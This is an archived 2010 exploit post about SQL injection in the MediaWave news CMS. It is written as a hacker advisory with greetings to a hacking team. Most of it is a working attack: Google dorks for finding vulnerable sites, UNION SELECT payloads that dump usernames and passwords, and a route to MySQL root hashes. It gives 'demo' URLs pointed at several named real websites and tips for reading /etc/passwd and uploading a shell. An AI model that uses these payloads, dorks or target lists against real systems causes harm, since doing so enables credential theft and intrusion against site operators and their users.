MediaWave (news) SQL Injection vulnerability
Posted on 14 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>MediaWave (news) SQL Injection vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================ MediaWave (news) SQL Injection vulnerability ============================================ # Exploit Title: [MediaWave(news)& more SQL injection] # Date: [14-6-2010] # Author: [CaSpErHaK] # Tested on: [linux] ====================Founded By CaSpErHaK=============== Dork in google:- inurl:"news_d.php?id=" and Another:- inurl:"news2.php?id=" # Exploit : 1st............http://[site/path/news_d.php?id={SQLi} ..........for site powered by MediaWave..... # Poc : union select 1,2,concat(ID,0x3a,nome,0x3a,pass),4+from+downloads_user-- ================= # Demo :- http://www.veraqualitas.com/news_d.php?ID=-15+union+select+1,2,concat(ID,0x3a,nome,0x3a,pass),4+from+downloads_user-- ============================================================================================================== ..........for 0ther site....... # Poc : union select 1,2,3,4,5,6,7,8,concat(id,0x3a,loginid,0x3a,password),10,11+from+lon_adminuser-- ================= # Demo :- http://www.levelone.eu/news_d.php?id=-90+union+select+1,2,3,4,5,6,7,8,concat(id,0x3a,loginid,0x3a,password),10,11+from+lon_adminuser-- ================================================================================================================ # u can get to root in some sites from Table "mysql.user" # Demo :- http://www.bedag.ch/news/news_d.php?id=-64+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(user,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user-- ================================================================================================================== /////////////////////////////////////////////////////////////////////////////// # Exploit : 2nd...............http://[site]/path/news2.php?id={SQLi} ........................for site powered by MediaWave............. # Poc : union select 1,2,3,concat(id,0x3a,usr,0x3a,pwd)+from+ssp_usrs-- ================ # Demo :- http://www.aubergeduchasseur.ch/news2.php?ID=-54+union select 1,2,3,concat(id,0x3a,usr,0x3a,pwd)+from+ssp_usrs-- ================================================================================================================ # ................for version 4............ # Poc : union+select+1,2,3,4,5,concat(user,0x3a,password),7+from+users-- # Demo : http://www.almaddbepk.com/news2.php?id=-35+union+select+1,2,3,4,5,concat(user,0x3a,password),7+from+users-- ================================================================================================================ # Note : 1 in u found version "5.0.84-log" from Database....... 0 u can use order SQL "load_file('/etc/passwd') 1 must be magic quotes=OFF by get to folder have chmod 777 u can inject file have extention ".php" 0 and have Remote File Inclusion then u can upload shell.txt? from any site 1 by get to folder have chmod 777 ==================== # Demo : http://www.mediawave.ch/news2_fr.php?ID=25+union+select+1,2,3,4,5,6,7,load_file('/etc/passwd')-- =============================================================================================================== Greetz to>>>>> H4ckforu Team.. KONDAMNE , Mr.Nid4 , Anti-tr4Ck3r , ra3ch & All Muslim KackeRs http://www.h4ckforu.com # Email : Casper_x28[at]hotmail.com # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
